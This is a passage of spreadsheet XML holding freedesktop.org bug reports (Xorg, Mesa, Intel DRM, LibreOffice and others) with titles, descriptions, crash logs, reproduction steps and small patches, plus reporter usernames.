   166     LLVMAddConstantPropagationPass(screen-&gt;pass)
   167     LLVMAddInstructionCombiningPass(screen-&gt;pass)
   168     LLVMAddPromoteMemoryToRegisterPass(screen-&gt;pass)
   169     LLVMAddGVNPass(screen-&gt;pass)
   170     LLVMAddCFGSimplificationPass(screen-&gt;pass)
   171  
   172     lp_jit_init_globals(screen)
   173  }</t>
  </si>
  <si>
    <t>XORG-48630</t>
  </si>
  <si>
    <t>Progress bars and other dynamic elements do not render properly with SNA enabled</t>
  </si>
  <si>
    <t>Created attachment 59887
Screenshot of bug symptoms
[    24.220] (II) intel(0): SNA compiled from 2.18.0-197-g09deba9
[    24.293] (II) intel(0): SNA initialized with SandyBridge backend</t>
  </si>
  <si>
    <t>erappleman</t>
  </si>
  <si>
    <t>XORG-9942</t>
  </si>
  <si>
    <t>radeon-randr12-v3 branch: crash on startup</t>
  </si>
  <si>
    <t>I tried to run the radeon-randr12-v3 driver with the randr1.2-for-xserver1.2 branch of the server. On my iBook G4 it crashes on startup in RADEONSetupConnectors. The backtrace is the same whether or not I have an external monitor connected.</t>
  </si>
  <si>
    <t>toojays</t>
  </si>
  <si>
    <t>LIBREOFFICE-81286</t>
  </si>
  <si>
    <t>When selecting (highlighting) cells with numbers SUM/AVERAGE/... in statusbar is calculated only after mouse button release</t>
  </si>
  <si>
    <t>Windows 7 64 bit
LibreOffice 4.2.5.2
Regression working properly in 4.1.6
Use any spreadsheet with numbers.
Highlight any number of cells which contain numbers for example A1:C5 but DON'T release mouse button.
Expected result:
In status bar you should see SUM of all cells you selected (or AVERAGE or whatever you set there).
Actual result:
Only first cell number is shown.
SUM is shown only after you release mouse button.
No test file is needed for this just enter any range of numbers in table.</t>
  </si>
  <si>
    <t>deena.francis</t>
  </si>
  <si>
    <t>XORG-25351</t>
  </si>
  <si>
    <t>[865] Hard hang when DPMS enters off state before or during screensaver</t>
  </si>
  <si>
    <t>On an Intel 82865G with KMS enabled the system will crash when X sets the dpms state to off and gnome-screensaver activates at that time or after. The machine becomes unresponsive to the mouse keyboard and network the only solution is to hard reset. Having the screensaver activate after dpms standby or suspend are entered does not crash the computer. The kernel does not leave any messages and nothing in /var/log can suggest any problem.
I'm using xf86-video-intel 2.9.1 xorg-server 1.7.1 gnome-screensaver 2.28.0 and kernel 2.6.31.6 with grsecurity for kernel stack randomization.</t>
  </si>
  <si>
    <t>djsweet33484</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-72358</t>
  </si>
  <si>
    <t>Add a rule to add specific 'Windows' layouts</t>
  </si>
  <si>
    <t>Created attachment 90308
Patch
Keyboards for use with Windows seem to have symbols imprinted                   
on some layouts which don't match the mappings defined by national              
standards and/or what has chosen as default for the respective                  
language.                                                                       
(like a second EuroSymbol mapping on the AltGr-5 key).                          
To allow the user to easily set a mapping which coincides with                  
what is imprinted on his keyboard an option 'misc:winlayout' has                
been created. It will add a symbol clause which augments the                    
default.                                                                        
A language specific model has been chosen to be able to extend                  
these mappings on a per language basis in the future.</t>
  </si>
  <si>
    <t>DRI-90462</t>
  </si>
  <si>
    <t>[SKL Regression]many kms_flip and kms_cursor_crc  subcases cause [drm:check_crtc_state [i915]] *ERROR* mismatch in dpll_hw_state.ctrl1 (expected 0x00000000 found 0x00000001)</t>
  </si>
  <si>
    <t>Created attachment 115794
dmesg
==System Environment==
--------------------------
Regression: yes
good commit:  de4de566f84b87f4d5f8265b11932088adb19896(dinq)
bad commit: 65de797816eadb227c45b0127d7ff92410fa3814(dinq)
Non-working platforms: SKL
==kernel==
--------------------------
drm-intel-nightly/6cf0fff478fa64991c2b7f2a44f2815d7a43a0b5
commit 6cf0fff478fa64991c2b7f2a44f2815d7a43a0b5
Author: Daniel Vetter 
Date:   Wed May 13 11:29:25 2015 +0200
    drm-intel-nightly: 2015y-05m-13d-09h-28m-49s UTC integration manifest
==Bug detailed description==
-----------------------------
It causes [  244.272369] [drm:check_crtc_state [i915]] *ERROR* mismatch in dpll_hw_state.ctrl1 (expected 0x00000000 found 0x00000001) on SKL with drm-intel-nightly kernel and drm-intel-next-queued kernel. 
It impacts 50+ cases.
run ./kms_flip --run-subtest blt-flip-vs-dpms 
output:
IGT-Version: 1.10-gc4ec47b (x86_64) (Linux: 4.1.0-rc3_drm-intel-nightly_6cf0ff_20150514+ x86_64)
Using monotonic timestamps
Beginning blt-flip-vs-dpms on crtc 20 connector 34
  3200x1800 60 3200 3248 3280 3316 1800 1802 1807 1816 0xa 0x48 361310
...........
blt-flip-vs-dpms on crtc 20 connector 34: PASSED
Beginning blt-flip-vs-dpms on crtc 25 connector 34
  3200x1800 60 3200 3248 3280 3316 1800 1802 1807 1816 0xa 0x48 361310
............
blt-flip-vs-dpms on crtc 25 connector 34: PASSED
Beginning blt-flip-vs-dpms on crtc 30 connector 34
  3200x1800 60 3200 3248 3280 3316 1800 1802 1807 1816 0xa 0x48 361310
............
blt-flip-vs-dpms on crtc 30 connector 34: PASSED
Subtest blt-flip-vs-dpms: SUCCESS (67.404s)
dmesg:
[  256.217620] [drm:check_crtc_state [i915]] *ERROR* mismatch in dpll_hw_state.ctrl1 (expected 0x00000000 found 0x00000001)
[  256.350817] ------------[ cut here ]------------
[  256.350854] WARNING: CPU: 0 PID: 5243 at drivers/gpu/drm/i915/intel_display.c:12094 check_crtc_state+0xb67/0xbd1 [i915]()
[  256.350857] pipe state doesn't match!
[  256.350860] Modules linked in: dm_mod snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic ppdev snd_hda_intel snd_hda_codec pcspkr snd_hda_core snd_hwdep snd_pcm i2c_i801 snd_timer snd soundcore wmi battery parport_pc parport ac acpi_cpufreq i915 button video drm_kms_helper drm joydev
[  256.350954] CPU: 0 PID: 5243 Comm: kms_flip Tainted: G        W       4.1.0-rc3_drm-intel-nightly_6cf0ff_20150514+ #230
[  256.350958] Hardware name: Intel Corporation Skylake Client platform/Skylake Y LPDDR3 RVP3 BIOS SKLSE2R1.86C.B067.R00.1412310711 12/31/2014
[  256.350962]  0000000000000000 0000000000000009 ffffffff817a67ac ffff880092e1f908
[  256.350973]  ffffffff8103ebde ffff880092e1f900 ffffffffa00d1924 ffff880004d40000
[  256.350981]  ffff8801491c7000 ffff880004e20000 ffff880092e1f990 ffff880094879c00
[  256.350988] Call Trace:
[  256.351002]  [] ? dump_stack+0x40/0x50
[  256.351011]  [] ? warn_slowpath_common+0x98/0xb0
[  256.351055]  [] ? check_crtc_state+0xb67/0xbd1 [i915]
[  256.351071]  [] ? warn_slowpath_fmt+0x45/0x4a
[  256.351123]  [] ? check_crtc_state+0xb67/0xbd1 [i915]
[  256.351198]  [] ? intel_modeset_check_state+0x4f6/0x87a [i915]
[  256.351244]  [] ? intel_post_enable_primary+0x53/0x94 [i915]
[  256.351274]  [] ? drm_mode_obj_set_property_ioctl+0xf0/0x193 [drm]
[  256.351299]  [] ? drm_mode_connector_property_set_ioctl+0x2c/0x31 [drm]
[  256.351321]  [] ? drm_ioctl+0x322/0x38d [drm]
[  256.351343]  [] ? drm_mode_obj_set_property_ioctl+0x193/0x193 [drm]
[  256.351353]  [] ? do_vfs_ioctl+0x360/0x424
[  256.351359]  [] ? __fput+0x184/0x19a
[  256.351364]  [] ? SyS_ioctl+0x49/0x7a
[  256.351371]  [] ? system_call_fastpath+0x12/0x6a
[  256.351376] ---[ end trace bac1956cadeda82e ]---
==Reproduce steps==
---------------------------- 
1. ./kms_flip --run-subtest blt-flip-vs-dpms</t>
  </si>
  <si>
    <t>conselvan2</t>
  </si>
  <si>
    <t>XORG-10677</t>
  </si>
  <si>
    <t>[xmag] information box does not removed in some cases</t>
  </si>
  <si>
    <t>Steps to reproduce:
 1. open xmag and take a screenshot
 2. press the mouse button so that the black information rectangle is shown. Keep it down
 3. Press Space
The black information rectangle stays on the screen and does not move around with the main window. When pressing the mouse button on the xmag window again it disappears.</t>
  </si>
  <si>
    <t>XORG-81289</t>
  </si>
  <si>
    <t>X11 segfaults when rotating display on xf86-video-intel-2.99.912</t>
  </si>
  <si>
    <t>Created attachment 102692
Xorg Error log
After upgrading from xf86-video-intel 2.99.911 to 2.99.912 X11 segfaults when trying to rotate a display. (See attached log)
This happens regardless of how many displays are attached and no matter which one is being rotated. It also happens when using only the notebook's internal display.
CPU: i3-3110M
GPU: HD Graphics 4000</t>
  </si>
  <si>
    <t>POPPLER-69608</t>
  </si>
  <si>
    <t>poppler_page_get_text() ordering does not agree with poppler_page_get_text_layout() as docs say it should</t>
  </si>
  <si>
    <t>Whilst trying to extract textual information from PDFs it seems that the documentation for poppler_page_get_text_layout() is not correct or there is a bug in poppler_page_get_text(). The documentation for poppler_page_get_text_layout says:
The position in the array represents an offset in the text returned by poppler_page_get_text().
(Note that the documentation says the same for poppler_page_get_text_attributes).
However this doesn't seem to be the case. The problem is described succinctly here complete with a short piece code which reproduces the problem:
http://www.mail-archive.com/poppler@lists.freedesktop.org/msg06238.html
The linked PDF [1] gives 1541 glyphs from poppler_page_get_text and 1477 glyphs from poppler_page_get_text_layout. It does not appear to be related to unicode encoding.
In addition to the numbers of glyphs not agreeing the order doesn't seem to match up either from what I can tell.
[1] http://ww1.microchip.com/downloads/en/DeviceDoc/22197B.pdf</t>
  </si>
  <si>
    <t>p</t>
  </si>
  <si>
    <t>XORG-3912</t>
  </si>
  <si>
    <t>XKB support for evdev</t>
  </si>
  <si>
    <t>the evdev input driver is totally ignorant of XKB it should be remappable like
any other keyboard.</t>
  </si>
  <si>
    <t>HARFBUZZ-54322</t>
  </si>
  <si>
    <t>HarfBuzz build fails on Clang/ARM r161757 with -Werror</t>
  </si>
  <si>
    <t>Created attachment 66405
Trivial patch fixing the compilation error
The implicit -Wincompatible-pointer-types warning raises typing issues in contrib/harfbuzz-freetype.c.
Note that this applies to the old version of HarfBuzz cloned from http://anongit.freedesktop.org/git/harfbuzz.old.git/ and used in Chromium.
Please find attached a patch fixing this.</t>
  </si>
  <si>
    <t>pliard</t>
  </si>
  <si>
    <t>DEJAVU-97081</t>
  </si>
  <si>
    <t>Condensed variants of DejaVu Sans and Serif no longer work</t>
  </si>
  <si>
    <t>Last week my Debian system upgraded the DejaVu font packages from version 2.35-1 to 2.36-1. Afterwards I noticed that in LibreOffice any text using Dejavu Sans Condensed had become invisible as if it was white text on a white background (which it wasn't). The same applies to Dejavu Serif Condensed. All other fonts are working fine.
This might be a bug in LibreOffice which was upgraded at the same time. However I don't think that's the case because I tried to type some text in GIMP using both DejaVu Sans (Book) and DejaVu Sans Condensed and the latter didn't seem condensed at all. Instead both fonts looked identical. I also found out that in Mousepad's font selector window not only Sans Condensed but also its Oblique Bold and Bold Oblique variants appeared identical to Sans Book.
Steps to reproduce:
1. Start LibreOffice Writer or Calc.
2. Select Dejavu Sans Condensed or Serif Condensed. Type some text.
3. What happens is that the cursor moves on the page but no text appears.
I'll be happy to provide more information as needed.
OS:
Debian stretch Linux 4.6.0-1-amd64
Packages:
fonts-dejavu-core 2.36-1
fonts-dejavu-extra 2.36-1
libreoffice 1:5.1.5~rc1-1</t>
  </si>
  <si>
    <t>jussi.hukkanen</t>
  </si>
  <si>
    <t>DRI-85354</t>
  </si>
  <si>
    <t>[BYT/BSW]igt/gem_userptr_blits/dmabuf-sync Bus error</t>
  </si>
  <si>
    <t>Created attachment 108277
dmesg
==System Environment==
--------------------------
Regression: not sure
Non-working platforms: BYT BSW
==kernel==
--------------------------
drm-intel-nightly/77683b77aa4da6e1788838dad2d2a15b0dfc290b
==Bug detailed description==
-----------------------------
gem_userptr_blits subcases dmabuf-sync and dmabuf-unsync causes bus error.
output:
IGT-Version: 1.8-gbba1cd0 (x86_64) (Linux: 3.18.0-rc1_drm-intel-nightly_77683b_20141023+ x86_64)
Aperture size is 2048 MiB
Total RAM is 3837 MiB
Testing unsynchronized mappings...
Testing synchronized mappings...
Bus error (core dumped)
==Reproduce steps==
---------------------------- 
1. ./gem_userptr_blits --run-subtest dmabuf-sync</t>
  </si>
  <si>
    <t>DRI-34937</t>
  </si>
  <si>
    <t>eDP panel flashes on resume.</t>
  </si>
  <si>
    <t>Created attachment 44028
Intel_reg_dump before suspend
When resuming after suspend on an HP Elitebook 2540p (which has an eDP panel) sometimes the panel flashes on and off at of order 1/second after resume.
Kernel.org 2.6.38-rc6 seemed to work ok (I never observed this previously common problem) but 2.6.38-rc7 showed this regression (seemed to be caused by patch  011b9910bda).
Before and after register dumps attached.</t>
  </si>
  <si>
    <t>XORG-1124</t>
  </si>
  <si>
    <t>Server/DDX/XQuartz</t>
  </si>
  <si>
    <t>Xevie library build failure on Darwin</t>
  </si>
  <si>
    <t>libXevie fails to build on Darwin. The following patch files this:
Index: darwinLib.tmpl
===============================================================
====
RCS file: /cvs/xorg/xc/config/cf/darwinLib.tmplv
retrieving revision 1.4
diff -u -d -b -w -r1.4 darwinLib.tmpl
--- darwinLib.tmpl      16 Aug 2004 16:36:13 -0000      1.4
+++ darwinLib.tmpl      18 Aug 2004 18:49:29 -0000
@@ -573 +574 @@
 #define SharedXfixesReqs    $(LDPRELIB) $(XLIB)
 #define SharedXdamageReqs   $(LDPRELIB) $(XFIXESLIB) $(XLIB)
 #define SharedXcompositeReqs $(LDPRELIB) $(XDAMAGELIB) $(XFIXESLIB) $(XLIB)
+#define SharedXevieReqs     $(LDPRELIB) $(XLIB)</t>
  </si>
  <si>
    <t>REALMD-56004</t>
  </si>
  <si>
    <t>Work around for problem with running authconfig without /sbin in path</t>
  </si>
  <si>
    <t>authconfig has a problem where it runs commands without an absolute path.
Work around this problem until upstream is fixed:
https://bugzilla.redhat.com/show_bug.cgi?id=866509</t>
  </si>
  <si>
    <t>MESA-23724</t>
  </si>
  <si>
    <t>sigsegv when readpixels from frontbuffer with i915</t>
  </si>
  <si>
    <t>Created attachment 29242
Test program
I've here a bigger program which worked in previous (cannot tell which) version of this package but currently it seems to crash when it calls glReadPixels. I tried to create a similar testcase for the bug report and noticed that it only(?) happened when I tried to read from frontbuffer. The simple test is attached to this mail. It can be compiled with:
g++ -o readpixels_z readpixels_z.cpp `sdl-config --cflags` `sdl-config --libs` -lGL -lGLU
Backtrace:
#0  0x00000000 in ?? ()
#1  0xb7729dba in _swrast_ReadPixels (ctx=0x64 x=0 y=0 width=100 height=100 format=6407 type=5121 packing=0x809a40c pixels=0xbfff7b98)
    at swrast/s_readpix.c:605
#2  0xb7604c49 in intelReadPixels (ctx=0x808d530 x=0 y=0 width=100 height=100 format=6407 type=5121 pack=0x809a40c pixels=0xbfff7b98)
	    at intel_pixel_read.c:305
#3  0xb7794ec6 in _mesa_ReadPixels (x=0 y=0 width=100 height=100 format=6407 type=5121 pixels=0xbfff7b98) at main/readpix.c:191
#4  0x08048e42 in Test_glReadPixels() ()
#5  0x0804908b in main ()
--- System information. ---
Architecture: i386
Kernel:       Linux 2.6.31-rc5
Debian Release: squeeze/sid
libc6  2.9-26
libdrm-intel1  2.4.12-1
libdrm2  2.4.12-1
libexpat1  2.0.1-4
Hardware is a EeePC  1000h</t>
  </si>
  <si>
    <t>robert.wohlrab</t>
  </si>
  <si>
    <t>DESKTOP-FILE-UTILS-20039</t>
  </si>
  <si>
    <t>update-desktop-database error message is bad</t>
  </si>
  <si>
    <t>Forwarding from https://bugs.maemo.org/show_bug.cgi?id=4093 .
$ update-desktop-database
No directories in update-desktop-database search path could be processed and
updated.
Please consider changing:
 and =&gt; or
String comes from desktop-file-utils-0.15/src/update-desktop-database.c .</t>
  </si>
  <si>
    <t>TELEPATHY-41927</t>
  </si>
  <si>
    <t>Installing unit tests</t>
  </si>
  <si>
    <t>Unit tests can be run with make check in the source tree but they cannot be
installed. Adding a configure option to install them could be useful for fully
automated tests.
(Same bug as Bug #41448 and Bug #41455 but for mission control)</t>
  </si>
  <si>
    <t>CAIRO-20183</t>
  </si>
  <si>
    <t>There are misprints in the spec for Creating paths and manipulating path data group</t>
  </si>
  <si>
    <t>- In the spec for cairo_get_current_point() there is a reference to the function cairo_stroke_to_path() but there isn't any specification for it in the standard and there isn't any declaration or implementation for it in the Cairo library source code.
So according to us this reference should be removed.
- In the spec for cairo_copy_path() the standard states:
This function will always return a valid pointer but the result will have no data (data==NULL and num_data==0) if either of the following conditions hold: 
1.If there is insufficient memory to copy the path. In this case path-&gt;status will be set to CAIRO_STATUS_NO_MEMORY. 
2.If cr is already in an error state. In this case path-&gt;status will contain the same status that would be returned by cairo_status(). 
In either case path-&gt;status will be set to CAIRO_STATUS_NO_MEMORY (regardless of what the error status in cr might have been).
The sentence In either case path-&gt;status will be set to CAIRO_STATUS_NO_MEMORY (regardless of what the error status in cr might have been) looks like redundant and opposite meaning with other parts of spec. This sentence should be removed.
Please give us your decision.
Thank you very much for your time.</t>
  </si>
  <si>
    <t>tructv</t>
  </si>
  <si>
    <t>PACKAGEKIT-20978</t>
  </si>
  <si>
    <t>gpk-application homepage link opens previously selected package's link</t>
  </si>
  <si>
    <t>If a package with no associated homepage link is selected after a package with an associated homepage was selected then clicking the homepage link opens the previously selected package's homepage.
Tested with gpk-application 0.3.14.
This seems to occur on all systems.
Steps to reproduce:
1. Select a package that is associated with a homepage
2. Select a package for which the homepage link is null
3. Click the homepage link
The link opens the link associated with the most recently selected package with a non-null homepage link. This confuses users. It *should* either A) do nothing or B) display an error message (e.g. No homepage found).</t>
  </si>
  <si>
    <t>dmyersturnbull</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-15803</t>
  </si>
  <si>
    <t>Created attachment 16309
Corbin Simpson's public SSH key
I really think the summary says it all. I have a git tree with an experimental r5xx fragment shader program compiler and some guys wanna see it.
Real name: Corbin Simpson
Email: MostAwesomeDude@gmail.com
Desired account name: MostAwesomeDude
GPG fingerprint is 0xF0B9BAD0. Public SSH is attached.</t>
  </si>
  <si>
    <t>MostAwesomedude</t>
  </si>
  <si>
    <t>MESA-67564</t>
  </si>
  <si>
    <t>HiZ buffers are much larger than necessary</t>
  </si>
  <si>
    <t>Found by code inspection:
The intel_miptree_alloc_hiz() function calls intel_miptree_create() passing it the exact same format first_level last_level width height depth and num_samples that were used to create the parent miptree.  This means that exactly the same amount of memory will be set aside for the HiZ buffer as for the main depth buffer.
For Z24 buffers this is too large by roughly a factor of 8.  For Z16 buffers it's too large by roughly a factor of 4.  This wastes physical memory as well as available aperture space since the kernel ensures that all of the pages of the HiZ buffer are resident and mapped into the GPU's address space before running an execbuffer even if not all of the pages are actually needed by the GPU.
For Gen7 we should use the formulas in the bspec to set the HiZ buffer size.  For Gen6 we may need to do some research to figure out the correct formulas because on Gen6 we are still using X/Y offsets to manually select which part of the miptree to render to and our notion of the miptree layout may not match that used by the hardware.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-1486</t>
  </si>
  <si>
    <t>CVSWEB broken</t>
  </si>
  <si>
    <t>When trying to access the xc/programs/Xserver/hw/xfree86 directory the web 
interface is broken.</t>
  </si>
  <si>
    <t>aaronw</t>
  </si>
  <si>
    <t>DRI-110675</t>
  </si>
  <si>
    <t>Regression: EDP panel flickers with linux 5.1+</t>
  </si>
  <si>
    <t>Created attachment 144258
edid-decode /sys/class/drm/card0-eDP-1/edid
Tested with 5.1.0 and 5.1.1 works with 5.0.15 and previous versions
Laptop screen flickers every once in a while since kernel 5.1
this is a Dell laptop - Alienware 15 ANW15-5350SLV Intel GPU (Well Intel/Nvidia but intel handles outputs)</t>
  </si>
  <si>
    <t>theli.ua</t>
  </si>
  <si>
    <t>TELEPATHY-44444</t>
  </si>
  <si>
    <t>gabble fails to load plugins on windows</t>
  </si>
  <si>
    <t>gabble splits the plugins path from : separator but on windows it should be . so gabble fails to locate the plugins.</t>
  </si>
  <si>
    <t>XORG-4381</t>
  </si>
  <si>
    <t>Corrupted BDFs generated when using fstobdf on a X.org xfs</t>
  </si>
  <si>
    <t>The original bug report including patch is at:
http://bugzilla.xfree.org/show_bug.cgi?id=93
The bug fix (see below) has been merged to XFree86's tree but not to X.org.
Patch needs to be applied in /xc/programs/fstobdf
--- chars.c.ori 2004-10-19 18:23:21.000000000 +0200
+++ chars.c     2004-10-20 12:21:06.000000000 +0200
@@ -2137 +2138 @@
          encoding=(chHigh &lt;&lt; 8)+chLow
        if ((charInfo-&gt;width != 0) || (charInfo-&gt;right != charInfo-&gt;left))
            EmitBitmap(outFile fontHeader charInfo encoding bpr glyph)
-       glyph += (charInfo-&gt;descent + charInfo-&gt;ascent) * bpr
+       glyph = glyphs +
+         offsets[encoding-((firstCharHigh &lt;&lt; 8)+firstCharLow) + 1].position
        charInfo++
       }
     }</t>
  </si>
  <si>
    <t>XORG-16766</t>
  </si>
  <si>
    <t>Crash with xinerama on xf86-driver-ati-6.9.0 xorg-server-1.4.2</t>
  </si>
  <si>
    <t>Created attachment 17735
xorg.conf of quad-head machine xinerama commented out
I have a setup with two radeon cards. I'm using the xf86-driver-ati-6.9.0 and xorg-server-1.4.2 packages. My setup works if xinerama is disabled and I get four independent screens. However if I try to enable xinerama in the serverflags section X crashes. I attach the configuration file and log file.</t>
  </si>
  <si>
    <t>XORG-100710</t>
  </si>
  <si>
    <t>GLAMOR: glamor-xv crashes in glamor_xv_render() on nouveau</t>
  </si>
  <si>
    <t>Description:
glamor-xv crashes in glamor_xv_render() on nouveau when playing mp4 file.
How reproducible:
Always
Steps to reproduce:
1. Xephyr -glamor -screen 1280x1024 :10
2. DISPLAY=:10 mplayer -vo xv somefile.mp4
Actual result:
Xephyr crashes in glamor_xv_render()
Additional info:
This issue is affecting Xwayland the same.
GLAMOR_DEBUG:
         glamor_pixmap_ensure_fb:	glamor: Failed to create fbo incomplete attachment
         glamor_pixmap_ensure_fb:	glamor: Failed to create fbo incomplete attachment
         glamor_pixmap_ensure_fb:	glamor: Failed to create fbo incomplete attachment
Backtrace signature (similar to Xwayland)
(EE) 
(EE) Backtrace:
(EE) 0: Xephyr (OsLookupColor+0x139) [0x5b36a9]
(EE) 1: /lib64/libpthread.so.0 (__restore_rt+0x0) [0x7f4998e915bf]
(EE) 2: Xephyr (glamor_pixmap_exchange_fbos+0x11b6) [0x45c616]
(EE) 3: Xephyr (glamor_pixmap_exchange_fbos+0x1bff) [0x45d9df]
(EE) 4: Xephyr (RemoveInputDeviceTraces+0x2153) [0x4ac473]
(EE) 5: Xephyr (XvFillColorKey+0x327) [0x4f7517]
(EE) 6: Xephyr (SendErrorToClient+0x405) [0x463ef5]
(EE) 7: Xephyr (InitFonts+0x428) [0x467e38]
(EE) 8: /lib64/libc.so.6 (__libc_start_main+0xf1) [0x7f4998ada401]
(EE) 9: Xephyr (_start+0x2a) [0x42787a]
(EE) 10: ? (?+0x2a) [0x2a]
(EE) 
(EE) Segmentation fault at address 0x8
(EE) 
Fatal server error:
(EE) Caught signal 11 (Segmentation fault). Server aborting
(EE) 
Aborted (core dumped)
Debugging:
(gdb) bt
#0  0x000000000045b746 in glamor_xv_render (port_priv=port_priv@entry=0x119ccc0) at glamor_xv.c:291
#1  0x000000000045c18f in glamor_xv_put_image (port_priv=0x119ccc0 pDrawable=0x1a4bc20 src_x= src_y= drw_x= 
    drw_y= src_w=1280 src_h=720 drw_w=1280 drw_h=720 id=842094169 
    buf=0x7fae87d7403c width=1280 height=720 sync=0 clipBoxes=0x7ffca2294290) at glamor_xv.c:508
#2  0x00000000004aa5f3 in KdXVPutImage (pDraw=0x1a4bc20 pPort=0x119dd00 pGC= src_x= src_y= src_w= 
    src_h=720 drw_x=0 drw_y=0 drw_w=1280 drw_h=720 format=0x119da90 
    data=0x7fae87d7403c sync=0 width=1280 height=720) at kxv.c:1413
#3  0x00000000004f73d7 in ProcXvPutImage (client=0x1a3d980) at xvdisp.c:865
#4  0x0000000000463e75 in Dispatch () at dispatch.c:479
#5  0x0000000000467df8 in dix_main (argc=5 argv=0x7ffca2294548 envp=) at main.c:287
#6  0x00007fae926e1401 in __libc_start_main () from /lib64/libc.so.6
#7  0x000000000042787a in _start ()
(gdb) list
286	
287	    for (i = 0 i &lt; 3 i++) {
288	        if (port_priv-&gt;src_pix[i]) {
289	            src_pixmap_priv[i] =
290	                glamor_get_pixmap_private(port_priv-&gt;src_pix[i])
291	            pixmap_priv_get_scale(src_pixmap_priv[i] &amp;src_xscale[i]
292	                                  
293	        }
294	    }
295	    glamor_make_current(glamor_priv)
(gdb) p src_pixmap_priv
$1 = {0x7fae87c92060 0x0 0x500}
(gdb) p port_priv-&gt;src_pix
$2 = {0x7fae87c92010 0x1a4c1f0 0x1a846c0}</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-51155</t>
  </si>
  <si>
    <t>LDTP freedesktop.org is down</t>
  </si>
  <si>
    <t>Today accessing ldtp.freedesktop.org I get the following error message:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator sitewranglers@lists.freedesktop.org and inform them of the time the error occurred and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Apache/2.2.16 (Debian) Server at ldtp.freedesktop.org Port 80
Thanks</t>
  </si>
  <si>
    <t>DRI-97394</t>
  </si>
  <si>
    <t>intel_dp_start_link_train failed to update link training (no monitor plugged in)</t>
  </si>
  <si>
    <t>Created attachment 125878
dmesg-2016-AUG-18.txt
I'm running drm-intel-nightly with modesetting driver to (hopefully) help provide additional information but this error has been occurring during boot on this laptop for all kernels since at least 4.4.
I've tried searching for solutions but most of them seem around problems with having a monitor plugged in. However I get this error 100% of the time while booting *without* a monitor plugged in.
First time reporting a bug here so please let me know how I can help with more info - dmesg should be attached:
Linux cirdan 4.8.0-1-drm-intel-nightly #1 SMP PREEMPT Wed Aug 17 20:46:46 MDT 2016 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>twelve.eighty</t>
  </si>
  <si>
    <t>DRI-93710</t>
  </si>
  <si>
    <t>4.4.0-rc7: [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue</t>
  </si>
  <si>
    <t>Created attachment 121025
/sys/class/drm/card0/error
[269775.753427] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[269775.753506] [drm] GPU hangs can indicate a bug anywhere in the entire gfx stack including userspace.
[269775.753507] [drm] Please file a _new_ bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
[269775.753508] [drm] drm/i915 developers can then reassign to the right component if it's not a kernel issue.
[269775.753509] [drm] The gpu crash dump is required to analyze gpu hangs so please always attach it.
[269775.753510] [drm] GPU crash dump saved to /sys/class/drm/card0/error
[269915.727405] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[269959.728650] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[269963.728783] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[269967.728893] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[269971.729018] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270009.730095] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270015.730245] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270076.762027] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270249.766961] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270255.767150] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270259.767439] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270273.767813] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270329.769279] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270379.740681] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270387.770929] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270391.771459] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270430.742148] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[270434.742281] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[271625.776388] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[271830.812272] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[271834.812396] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue
[271838.812515] [drm] GPU HANG: ecode 6:-1:0x00000000 reason: Kicking stuck wait on render ring action: continue</t>
  </si>
  <si>
    <t>mmokrejs</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-8629</t>
  </si>
  <si>
    <t>.dir files don't get properly generated with srcdir != objdir</t>
  </si>
  <si>
    <t>Patch attached.</t>
  </si>
  <si>
    <t>XORG-14350</t>
  </si>
  <si>
    <t>xf86-video-ark fails to compile with current git xserver</t>
  </si>
  <si>
    <t>Created attachment 14119
fix
SSIA - xf86-video-ark uses obsolete PCI functions</t>
  </si>
  <si>
    <t>LIBREOFFICE-36538</t>
  </si>
  <si>
    <t>FILESAVE: RTF does not apply subscript font size reduction</t>
  </si>
  <si>
    <t>Created attachment 46015
RTF with subscript
Saving file copy to RTF doesn't apply original subscript and superscript font size reduction.</t>
  </si>
  <si>
    <t>massimo</t>
  </si>
  <si>
    <t>MESA-9046</t>
  </si>
  <si>
